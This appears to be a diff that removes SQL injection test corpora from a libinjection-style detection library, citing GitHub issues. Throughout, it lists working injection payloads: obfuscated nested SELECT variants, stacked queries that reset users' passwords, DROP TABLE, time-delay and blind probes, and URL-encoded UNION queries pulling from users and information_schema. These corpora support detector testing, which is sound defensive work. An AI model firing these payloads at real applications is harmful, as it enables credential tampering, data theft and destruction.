|
||||
( COS ( BINARY ( 'b')) ) --
|
||||
( COS ( BINARY COS ( 'b')) ) --
|
||||
( COS ( @a OR 'b') ) --
|
||||
( 'a' OR 1 ) --
|
||||
( 'a' OR 'a' ) --
|
||||
( 'a' OR @a ) --
|
||||
( 'a' ) --
|
||||
( 'a' * 1 ) --
|
||||
( 'a' * 'a' ) --
|
||||
( 'a' * @a ) --
|
||||
( BINARY ( SELECT 'b') ) --
|
||||
( ( BINARY ( 'b')) ) --
|
||||
( BINARY BINARY ( 'b') ) --
|
||||
( BINARY BINARY COS ( 'b') ) --
|
||||
( ( @a OR 'b') ) --
|
||||
( ( @a * 'b') ) --
|
||||
( 1 in ( BINARY COS ( 'b')) ) --
|
||||
( (SELECT ( 1 OR 'b')) ) --
|
||||
( (SELECT ( SELECT 1)) ) --
|
||||
( (SELECT ( SELECT @a)) ) --
|
||||
( (SELECT ( 'a' OR 'b')) ) --
|
||||
( (SELECT ( BINARY ( 'b'))) ) --
|
||||
( (SELECT ( BINARY COS ( 'b'))) ) --
|
||||
( (SELECT ( @a OR 'b')) ) --
|
||||
( (SELECT 1 OR ( 'b')) ) --
|
||||
( (SELECT 1 OR 1) ) --
|
||||
( (SELECT 1 OR COS ( 'b')) ) --
|
||||
( (SELECT 1 OR @a) ) --
|
||||
( (SELECT 1 LIMIT 1) ) --
|
||||
( (SELECT COS ( 1 OR 'b')) ) --
|
||||
( (SELECT COS ( ( SELECT 'b'))) ) --
|
||||
( (SELECT COS ( 'a' OR 'b')) ) --
|
||||
( (SELECT COS ( BINARY ( 'b'))) ) --
|
||||
( (SELECT COS ( BINARY COS ( 'b'))) ) --
|
||||
( (SELECT COS ( @a OR 'b')) ) --
|
||||
( (SELECT 'a' OR ( 'b')) ) --
|
||||
( (SELECT 'a' OR 1) ) --
|
||||
( (SELECT 'a' OR COS ( 'b')) ) --
|
||||
( (SELECT 'a' OR @a) ) --
|
||||
( (SELECT 'a' LIMIT 1) ) --
|
||||
( (SELECT BINARY ( 1)) ) --
|
||||
( (SELECT BINARY ( SELECT 'b')) ) --
|
||||
( (SELECT BINARY ( COS ( 'b'))) ) --
|
||||
( (SELECT BINARY ( @a)) ) --
|
||||
( (SELECT BINARY COS ( 1)) ) --
|
||||
( (SELECT BINARY COS ( COS ( 'b'))) ) --
|
||||
( (SELECT BINARY COS ( @a)) ) --
|
||||
( (SELECT BINARY BINARY ( 'b')) ) --
|
||||
( (SELECT BINARY BINARY COS ( 'b')) ) --
|
||||
( (SELECT @a OR ( 'b')) ) --
|
||||
( (SELECT @a OR 1) ) --
|
||||
( (SELECT @a OR COS ( 'b')) ) --
|
||||
( (SELECT @a OR @a) ) --
|
||||
( (SELECT @a LIMIT 1) ) --
|
||||
( COS ( 1 OR ( 'b')) ) --
|
||||
( COS ( 1 OR 1) ) --
|
||||
( COS ( 1 OR COS ( 'b')) ) --
|
||||
( COS ( 1 OR @a) ) --
|
||||
( COS ( COS ( ( SELECT 'b'))) ) --
|
||||
( COS ( COS ( BINARY ( 'b'))) ) --
|
||||
( COS ( 'a' OR ( 'b')) ) --
|
||||
( COS ( 'a' OR 1) ) --
|
||||
( COS ( 'a' OR COS ( 'b')) ) --
|
||||
( COS ( 'a' OR @a) ) --
|
||||
( COS ( BINARY ( 1)) ) --
|
||||
( COS ( BINARY ( SELECT 'b')) ) --
|
||||
( COS ( BINARY ( COS ( 'b'))) ) --
|
||||
( COS ( BINARY ( @a)) ) --
|
||||
( COS ( BINARY BINARY ( 'b')) ) --
|
||||
( COS ( BINARY BINARY COS ( 'b')) ) --
|
||||
( COS ( @a OR ( 'b')) ) --
|
||||
( COS ( @a OR 1) ) --
|
||||
( COS ( @a OR COS ( 'b')) ) --
|
||||
( COS ( @a OR @a) ) --
|
||||
( BINARY ( 1 OR 'b') ) --
|
||||
( BINARY ( SELECT ( 'b')) ) --
|
||||
( BINARY ( SELECT 1) ) --
|
||||
( BINARY ( SELECT COS ( 'b')) ) --
|
||||
( BINARY ( SELECT @a) ) --
|
||||
( BINARY ( 'a' OR 'b') ) --
|
||||
( BINARY ( BINARY COS ( 'b')) ) --
|
||||
( BINARY ( @a OR 'b') ) --
|
||||
( BINARY COS ( 1 OR 'b') ) --
|
||||
( BINARY COS ( ( SELECT 'b')) ) --
|
||||
( BINARY COS ( 'a' OR 'b') ) --
|
||||
( BINARY COS ( BINARY ( 'b')) ) --
|
||||
( BINARY COS ( BINARY COS ( 'b')) ) --
|
||||
( BINARY COS ( @a OR 'b') ) --
|
||||
( BINARY BINARY ( 1) ) --
|
||||
( BINARY BINARY ( SELECT 'b') ) --
|
||||
( BINARY BINARY ( COS ( 'b')) ) --
|
||||
( BINARY BINARY ( @a) ) --
|
||||
( BINARY BINARY COS ( 1) ) --
|
||||
( BINARY BINARY COS ( COS ( 'b')) ) --
|
||||
( BINARY BINARY COS ( @a) ) --
|
||||
( BINARY BINARY BINARY ( 'b') ) --
|
||||
( BINARY BINARY BINARY COS ( 'b') ) --
|
||||
( @a in ( BINARY COS ( 'b')) ) --
|
||||
( 1 OR ( BINARY ( 'b')) ) --
|
||||
( 1 OR ( BINARY COS ( 'b')) ) --
|
||||
( 1 OR COS ( BINARY ( 'b')) ) --
|
||||
( 1 ) in ( BINARY ( 'b') ) --
|
||||
( 1 in ( BINARY BINARY ( 'b')) ) --
|
||||
( 1 * COS ( BINARY ( 'b')) ) --
|
||||
( (SELECT ( 1 OR ( 'b'))) ) --
|
||||
( (SELECT ( 1 OR 1)) ) --
|
||||
( (SELECT ( 1 OR COS ( 'b'))) ) --
|
||||
( (SELECT ( 1 OR @a)) ) --
|
||||
( (SELECT ( SELECT 1 OR 'b')) ) --
|
||||
( (SELECT ( SELECT 'a' OR 'b')) ) --
|
||||
( (SELECT ( SELECT BINARY ( 'b'))) ) --
|
||||
( (SELECT ( SELECT BINARY COS ( 'b'))) ) --
|
||||
( (SELECT ( SELECT @a OR 'b')) ) --
|
||||
( (SELECT ( COS ( ( SELECT 'b')))) ) --
|
||||
( (SELECT ( COS ( BINARY ( 'b')))) ) --
|
||||
( (SELECT ( 'a' OR ( 'b'))) ) --
|
||||
( (SELECT ( 'a' OR 1)) ) --
|
||||
( (SELECT ( 'a' OR COS ( 'b'))) ) --
|
||||
( (SELECT ( 'a' OR @a)) ) --
|
||||
( (SELECT ( BINARY ( 1))) ) --
|
||||
( (SELECT ( BINARY ( SELECT 'b'))) ) --
|
||||
( (SELECT ( BINARY ( COS ( 'b')))) ) --
|
||||
( (SELECT ( BINARY ( @a))) ) --
|
||||
( (SELECT ( BINARY BINARY ( 'b'))) ) --
|
||||
( (SELECT ( BINARY BINARY COS ( 'b'))) ) --
|
||||
( (SELECT ( @a OR ( 'b'))) ) --
|
||||
( (SELECT ( @a OR 1)) ) --
|
||||
( (SELECT ( @a OR COS ( 'b'))) ) --
|
||||
( (SELECT ( @a OR @a)) ) --
|
||||
( (SELECT 1 OR ( 1)) ) --
|
||||
( (SELECT 1 OR ( COS ( 'b'))) ) --
|
||||
( (SELECT 1 OR ( @a)) ) --
|
||||
( (SELECT 1 OR 1 * 'b') ) --
|
||||
( (SELECT 1 OR 'a' * 'b') ) --
|
||||
( (SELECT 1 OR @a * 'b') ) --
|
||||
( (SELECT 1 ) OR ( 'b') ) --
|
||||
( (SELECT 1 ) OR COS ( 'b') ) --
|
||||
( ( SELECT 1 ) OR 'b' ) --
|
||||
( (SELECT 1 UNION ( SELECT 'b')) ) --
|
||||
( (SELECT 1 in ( BINARY ( 'b'))) ) --
|
||||
( (SELECT COS ( ( SELECT ( 'b')))) ) --
|
||||
( (SELECT COS ( ( SELECT 1))) ) --
|
||||
( (SELECT COS ( ( SELECT COS ( 'b')))) ) --
|
||||
( (SELECT COS ( ( SELECT @a))) ) --
|
||||
( (SELECT COS ( BINARY BINARY ( 'b'))) ) --
|
||||
( (SELECT 'a' OR ( 1)) ) --
|
||||
( (SELECT 'a' OR ( COS ( 'b'))) ) --
|
||||
( (SELECT 'a' OR ( @a)) ) --
|
||||
( (SELECT 'a' OR 1 * 'b') ) --
|
||||
( (SELECT 'a' OR 'a' * 'b') ) --
|
||||
( (SELECT 'a' OR @a * 'b') ) --
|
||||
( (SELECT 'a' ) OR ( 'b') ) --
|
||||
( (SELECT 'a' ) OR COS ( 'b') ) --
|
||||
( ( SELECT 'a' ) OR 'b' ) --
|
||||
( (SELECT 'a' UNION ( SELECT 'b')) ) --
|
||||
( (SELECT 'a' in ( BINARY ( 'b'))) ) --
|
||||
( (SELECT BINARY ( 1 OR 'b')) ) --
|
||||
( (SELECT BINARY ( 1 * 'b')) ) --
|
||||
( (SELECT BINARY ( SELECT ( 'b'))) ) --
|
||||
( (SELECT BINARY ( SELECT 1)) ) --
|
||||
( (SELECT BINARY ( SELECT COS ( 'b'))) ) --
|
||||
( (SELECT BINARY ( SELECT @a)) ) --
|
||||
( (SELECT BINARY ( 'a' OR 'b')) ) --
|
||||
( (SELECT BINARY ( 'a' * 'b')) ) --
|
||||
( (SELECT BINARY ( BINARY ( 'b'))) ) --
|
||||
( (SELECT BINARY ( BINARY COS ( 'b'))) ) --
|
||||
( (SELECT BINARY ( @a OR 'b')) ) --
|
||||
( (SELECT BINARY ( @a * 'b')) ) --
|
||||
( (SELECT BINARY COS ( ( SELECT 'b'))) ) --
|
||||
( (SELECT BINARY COS ( BINARY ( 'b'))) ) --
|
||||
( (SELECT BINARY BINARY ( 1)) ) --
|
||||
( (SELECT BINARY BINARY ( SELECT 'b')) ) --
|
||||
( (SELECT BINARY BINARY ( COS ( 'b'))) ) --
|
||||
( (SELECT BINARY BINARY ( @a)) ) --
|
||||
( (SELECT BINARY BINARY BINARY ( 'b')) ) --
|
||||
( (SELECT BINARY BINARY BINARY COS ( 'b')) ) --
|
||||
( (SELECT @a OR ( 1)) ) --
|
||||
( (SELECT @a OR ( COS ( 'b'))) ) --
|
||||
( (SELECT @a OR ( @a)) ) --
|
||||
( (SELECT @a OR 1 * 'b') ) --
|
||||
( (SELECT @a OR 'a' * 'b') ) --
|
||||
( (SELECT @a OR @a * 'b') ) --
|
||||
( (SELECT @a ) OR ( 'b') ) --
|
||||
( (SELECT @a ) OR COS ( 'b') ) --
|
||||
( ( SELECT @a ) OR 'b' ) --
|
||||
( (SELECT @a UNION ( SELECT 'b')) ) --
|
||||
( (SELECT @a in ( BINARY ( 'b'))) ) --
|
||||
( COS ( ( SELECT ( SELECT 'b'))) ) --
|
||||
( COS ( ( SELECT 1 OR 'b')) ) --
|
||||
( COS ( ( SELECT 'a' OR 'b')) ) --
|
||||
( COS ( ( SELECT BINARY ( 'b'))) ) --
|
||||
( COS ( ( SELECT BINARY COS ( 'b'))) ) --
|
||||
( COS ( ( SELECT @a OR 'b')) ) --
|
||||
( COS ( BINARY ( BINARY ( 'b'))) ) --
|
||||
( COS ( BINARY BINARY BINARY ( 'b')) ) --
|
||||
( 'a' OR ( BINARY ( 'b')) ) --
|
||||
( 'a' OR ( BINARY COS ( 'b')) ) --
|
||||
( 'a' OR COS ( BINARY ( 'b')) ) --
|
||||
( 'a' ) in ( BINARY ( 'b') ) --
|
||||
( 'a' * COS ( BINARY ( 'b')) ) --
|
||||
( BINARY ( 1 OR ( 'b')) ) --
|
||||
( BINARY ( 1 OR 1) ) --
|
||||
( BINARY ( 1 OR COS ( 'b')) ) --
|
||||
( BINARY ( 1 OR @a) ) --
|
||||
( BINARY ( 1 ) OR 'b' ) --
|
||||
( BINARY ( SELECT ( 1)) ) --
|
||||
( BINARY ( SELECT ( SELECT 'b')) ) --
|
||||
( BINARY ( SELECT ( COS ( 'b'))) ) --
|
||||
( BINARY ( SELECT ( @a)) ) --
|
||||
( BINARY ( SELECT 1 OR 'b') ) --
|
||||
( BINARY ( SELECT 1 * 'b') ) --
|
||||
( BINARY ( SELECT 'a' OR 'b') ) --
|
||||
( BINARY ( SELECT 'a' * 'b') ) --
|
||||
( BINARY ( SELECT BINARY ( 'b')) ) --
|
||||
( BINARY ( SELECT BINARY COS ( 'b')) ) --
|
||||
( BINARY ( SELECT @a OR 'b') ) --
|
||||
( BINARY ( SELECT @a * 'b') ) --
|
||||
( BINARY ( COS ( ( SELECT 'b'))) ) --
|
||||
( BINARY ( COS ( BINARY ( 'b'))) ) --
|
||||
( BINARY ( 'a' OR ( 'b')) ) --
|
||||
( BINARY ( 'a' OR 1) ) --
|
||||
( BINARY ( 'a' OR COS ( 'b')) ) --
|
||||
( BINARY ( 'a' OR @a) ) --
|
||||
( BINARY ( 'a' ) OR 'b' ) --
|
||||
( BINARY ( BINARY ( SELECT 'b')) ) --
|
||||
( BINARY ( BINARY BINARY ( 'b')) ) --
|
||||
( BINARY ( BINARY BINARY COS ( 'b')) ) --
|
||||
( BINARY ( @a OR ( 'b')) ) --
|
||||
( BINARY ( @a OR 1) ) --
|
||||
( BINARY ( @a OR COS ( 'b')) ) --
|
||||
( BINARY ( @a OR @a) ) --
|
||||
( BINARY ( @a ) OR 'b' ) --
|
||||
( BINARY COS ( ( SELECT ( 'b'))) ) --
|
||||
( BINARY COS ( ( SELECT 1)) ) --
|
||||
( BINARY COS ( ( SELECT COS ( 'b'))) ) --
|
||||
( BINARY COS ( ( SELECT @a)) ) --
|
||||
( BINARY COS ( BINARY BINARY ( 'b')) ) --
|
||||
( BINARY BINARY ( 1 OR 'b') ) --
|
||||
( BINARY BINARY ( 1 * 'b') ) --
|
||||
( BINARY BINARY ( SELECT ( 'b')) ) --
|
||||
( BINARY BINARY ( SELECT 1) ) --
|
||||
( BINARY BINARY ( SELECT COS ( 'b')) ) --
|
||||
( BINARY BINARY ( SELECT @a) ) --
|
||||
( BINARY BINARY ( 'a' OR 'b') ) --
|
||||
( BINARY BINARY ( 'a' * 'b') ) --
|
||||
( BINARY BINARY ( BINARY ( 'b')) ) --
|
||||
( BINARY BINARY ( BINARY COS ( 'b')) ) --
|
||||
( BINARY BINARY ( @a OR 'b') ) --
|
||||
( BINARY BINARY ( @a * 'b') ) --
|
||||
( BINARY BINARY COS ( ( SELECT 'b')) ) --
|
||||
( BINARY BINARY COS ( BINARY ( 'b')) ) --
|
||||
( BINARY BINARY BINARY ( 1) ) --
|
||||
( BINARY BINARY BINARY ( SELECT 'b') ) --
|
||||
( BINARY BINARY BINARY ( COS ( 'b')) ) --
|
||||
( BINARY BINARY BINARY ( @a) ) --
|
||||
( BINARY BINARY BINARY BINARY ( 'b') ) --
|
||||
( BINARY BINARY BINARY BINARY COS ( 'b') ) --
|
||||
( @a OR ( BINARY ( 'b')) ) --
|
||||
( @a OR ( BINARY COS ( 'b')) ) --
|
||||
( @a OR COS ( BINARY ( 'b')) ) --
|
||||
( @a ) in ( BINARY ( 'b') ) --
|
||||
( @a in ( BINARY BINARY ( 'b')) ) --
|
||||
( @a * COS ( BINARY ( 'b')) ) --
|
||||
( 1 - (SELECT BINARY ( 1)) ) --
|
||||
( 1 - BINARY ( SELECT 1) ) --
|
||||
( 1 - BINARY COS ( ( 1)) ) --
|
||||
( 1 - BINARY BINARY ( 1) ) --
|
||||
( 1 - BINARY BINARY COS ( 1) ) --
|
||||
( 1 - BINARY BINARY BINARY ( 'b') ) --
|
||||
( 'a' or (SELECT BINARY ( 'b')) ) --
|
||||
( 'a' or BINARY ( SELECT 'b') ) --
|
||||
( 'a' or BINARY COS ( 1) ) --
|
||||
( 'a' or BINARY BINARY ( 'b') ) --
|
||||
( 'a' or BINARY BINARY COS ( 'b') ) --
|
||||
( 1 IN (1) or (SELECT BINARY ( 'b')) ) --
|
||||
( 1 IN (1) or BINARY ( SELECT 'b') ) --
|
||||
( 1 IN (1) or BINARY COS ( 1) ) --
|
||||
( 1 IN (1) or BINARY BINARY ( 'b') ) --
|
||||
( 1 IN (1) or BINARY BINARY COS ( 'b') ) --
|
||||
(select 1 from dual union select 1 limit 1) --
|
||||
(select 1); (select 1); update users set password = 99
|
||||
(select 1); select 1; update users set password = 99
|
||||
select 1; (select 1); update users set password = 99
|
||||
1; update users set password=1
|
||||
( (SELECT 'b') ) ; UPDATE user set password = 99;
|
||||
( (SELECT @a) ) ; UPDATE user set password = 99;
|
|
@ -1,6 +0,0 @@
|
|||
# https://github.com/client9/libinjection/issues/110
|
||||
# lots of great details in this ticket HT: @lifeforms
|
||||
|
||||
id having (1 or 1)
|
||||
id having (1 or true)
|
||||
id having (true or 1)
|
|
@ -1,4 +0,0 @@
|
|||
# https://github.com/client9/libinjection/issues/114
|
||||
# ht @sshayb
|
||||
|
||||
; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2
|
|
@ -1 +0,0 @@
|
|||
name=David' AND 2259=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(113)||CHR(122)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2259=2259) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND 'XrMo' LIKE 'XrMo
|
|
@ -1,11 +0,0 @@
|
|||
# https://github.com/client9/libinjection/issues/125 HT @d0znpp
|
||||
|
||||
"-sqlite_version() UNION SELECT password FROM users- --
|
||||
1337) INTO OUTFILE ‘xxx’--
|
||||
123);DROP TABLE users--
|
||||
) OR (SELECT password FROM users ...
|
||||
|
||||
# the following don't fit into the libinjection model and are
|
||||
# best handled in another layer, at least for now.
|
||||
#)-sleep(9999
|
||||
#*/UNION SELECT password FROM users--
|
|
@ -1,3 +0,0 @@
|
|||
# https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/782
|
||||
|
||||
.1or-UTC_DATE--
|
|
@ -1,265 +0,0 @@
|
|||
1%20AND%20%28select%20DCount%28last%28username%29
|
||||
1%29%20from%20users%20where%20username%3D%27ad1min%27%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20substr%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
|
||||
%28select%20substr%20%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
|
||||
%28select%20login/2%20from%20users%20limit%201%2C1%29
|
||||
%28select%20login/2%20%0D%0A%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x00%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x30%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x3%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-0union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-.1union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-.1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-.1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20table_name%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C%0D%0A%0D%0A1%0D%0A%0D%0A%2C%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A1%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
%28select%20substr%0D%0A%28login%0D%0A%2C
|
||||
%28select%20substr%28login%0D%0A%29
|
||||
%28select%20substr%28login%29
|
||||
%28select%20substr%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
##%28select%20asd%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
/%2A%20BAR%20%2A/%20UNION%20ALL%20SELECT%20%282%2C3%2C4%29
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
%27%20or%201%3D1%20or%20%27
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
0x1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27foo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
a%0D%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
id%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20xxx%20from%20users%20limit%201%2C1%29
|
||||
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
|
||||
%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
